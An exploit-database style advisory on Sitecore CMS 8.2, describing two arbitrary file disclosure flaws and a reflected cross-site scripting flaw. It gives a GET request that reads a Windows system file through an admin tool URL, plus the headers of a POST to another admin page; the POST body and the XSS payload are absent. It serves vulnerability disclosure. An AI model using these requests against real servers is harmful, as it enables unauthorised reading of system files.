Exploits / Vulnerability Discovered : 2017-05-05 |
Type : webapps |
Platform : aspx
This exploit / vulnerability Sitecore cms 8.2 crosssite scripting / arbitrary file disclosure is for educational purposes only and if it is used you will do on your own risk!
Disclaimer: Everything mentioned below is for educational puposes. The
vulnerability details are mentioned as is. I would not be held responsible
for any misuse of this information.
Summary:
Multiple vulnerabilities were found in the Sitecore product. The
vulnerabilities include two instances of arbitrary file access and once
instance of reflected cosssite scripting.
1: Arbitrary file access:
- Description:
The vulnerability lies in the tools which can be accessed via the
administrator user. The vulnerability exists because there is no bound
check for absolute path in the application, that is, if the absolute path
is provided to the vulnerable URL, it reads the path and shows the contents
of the file requested.
- Exploit:
1. Once authenticated as the administrator perform a GET request to the
followiung URL:
/sitecore/shell/Applications/Layouts/IDE.aspx?fi=c:\windows\win.ini
2. Once authenticated as the administrator perform a POST request to the
followiung URL:
POST /sitecore/admin/LinqScratchPad.aspx
HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 1463
Referer: <OMITTED>
Cookie: <OMITTED>
Connection: close
Upgrade-Insecure-Requests: 1
2. Reflected Cross-site Scripting:
- Description:
The application does not sanatize the USER input which allows a normal
authenticated user to exploit this vulnerability.